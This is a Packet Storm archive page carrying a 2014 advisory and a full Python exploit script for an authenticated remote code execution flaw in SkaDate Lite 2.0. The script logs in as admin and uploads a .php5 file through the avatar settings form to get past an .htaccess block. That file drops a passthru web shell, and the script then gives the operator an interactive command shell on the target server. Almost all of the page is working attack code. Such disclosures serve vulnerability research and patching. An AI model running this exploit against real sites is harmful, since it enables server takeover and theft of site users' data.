exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SkaDate Lite 2.0 Remote Code Execution

SkaDate Lite 2.0 Remote Code Execution
Posted Jul 30, 2014
Authored by LiquidWorm | Site zeroscience.mk

SkaDate Lite version 2.0 suffers from an authenticated arbitrary PHP code execution vulnerability. This is caused due to the improper verification of uploaded files in '/admin/settings/user' script thru the 'avatar' and 'bigAvatar' POST parameters. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file with '.php5' extension (to bypass the '.htaccess' block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/' directory.

tags | exploit, arbitrary, php, code execution
SHA-256 | 2f06fa68d2220b816e7d3b3b873ab1d8786c653f2c88bfd5a622ef6802184c6e

SkaDate Lite 2.0 Remote Code Execution

Change Mirror Download
#!/usr/bin/env python
#
#
# SkaDate Lite 2.0 Remote Code Execution Exploit
#
#
# Vendor: Skalfa LLC
# Product web page: http://lite.skadate.com | http://www.skalfa.com
# Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]
#
# Summary: SkaDate Lite is a new platform that makes it easy to
# start online dating business in just a few easy steps. No
# programming or design knowledge is required. Install the solution,
# pick a template, and start driving traffic to your new online
# dating site.
#
# Desc: SkaDate Lite suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper
# verification of uploaded files in '/admin/settings/user' script
# thru the 'avatar' and 'bigAvatar' POST parameters. This can be
# exploited to execute arbitrary PHP code by uploading a malicious
# PHP script file with '.php5' extension (to bypass the '.htaccess'
# block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/'
# directory.
#
# Tested on: CentOS Linux 6.5 (Final)
# nginx/1.6.0
# PHP/5.3.28
# MySQL 5.5.37
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5198
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5198.php
#
#
# 23.07.2014
#
#

version = '4.0.0.251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
print '''
@---------------------------------------------------------------@
| |
| SkaDate Lite 2.0 Remote Code Execution Exploit |
| |
| |
| ID: ZSL-2014-5198 |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
@---------------------------------------------------------------@
'''
if len(sys.argv) < 2:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
opener.open('http://'+host+'/sign-in?back-uri=admin')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
print
sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login please.'

username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')

login_data = urllib.urlencode({
'form_name' : 'sign-in',
'identity' : username,
'password' : password,
'remember' : 'on',
'submit' : 'Sign In'
})

try:
login = opener.open('http://'+host+'/sign-in?back-uri=admin', login_data)
auth = login.read()
except urllib2.HTTPError, errorziotraj:
if errorziotraj.code == 403:
print '\x20\x20[*] '+Fore.RED+'Blocked by WAF.'+Fore.RESET
print
sys.exit()

for session in cj:
sessid = session.name

print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET

if re.search(r'Invalid username or email', auth):
print '\x20\x20[*] Invalid username or email given '+'.'*23+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
elif re.search(r'Invalid password', auth):
print '\x20\x20[*] Invalid password '+'.'*38+Fore.RED+'[ER]'+Fore.RESET
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET


class MultiPartForm(object):

def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return

def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary

def add_field(self, name, value):
self.form_fields.append((name, value))
return

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return

def __str__(self):

parts = []
part_boundary = '--' + self.boundary

parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)

parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)

flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)

if __name__ == '__main__':

form = MultiPartForm()
form.add_field('form_name', 'userSettingsForm')
form.add_field('displayName', 'realname')
form.add_field('confirmEmail', 'on')
form.add_field('avatarSize', '90')
form.add_field('bigAvatarSize', '190')
form.add_field('avatar', '')
form.add_field('join_display_photo_upload', 'display')
form.add_field('save', 'Save')

form.add_file('bigAvatar', 'thricerbd.php5',
fileHandle=StringIO('<?php system(\'echo \"<?php echo \\"<pre>\\"; passthru(\$_GET[\\\'cmd\\\']); echo \\"</pre>\\"; ?>\" > liwo.php5\'); ?>'))

request = urllib2.Request('http://'+host+'/admin/settings/user')
request.add_header('User-agent', 'joxypoxy 4.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
checkfilename = urllib2.urlopen(request).read()
filename = re.search('default_avatar_big_(\w+)', checkfilename).group(1)
print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File name: '+Fore.YELLOW+'default_avatar_big_'+filename+'.php5'+Fore.RESET

opener.open('http://'+host+'/ow_userfiles/plugins/base/avatars/default_avatar_big_'+filename+'.php5')
print '\x20\x20[*] Persisting file liwo.php5 '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET

print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)

furl = '/ow_userfiles/plugins/base/avatars/liwo.php5'

print
today = datetime.date.today()
fname = 'skadate-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: SkaDate Lite 2.0 Remote Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5198')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener.open('http://'+host+furl+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET

if cmd.strip() == 'exit':
break

logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break

logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print

sys.exit()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close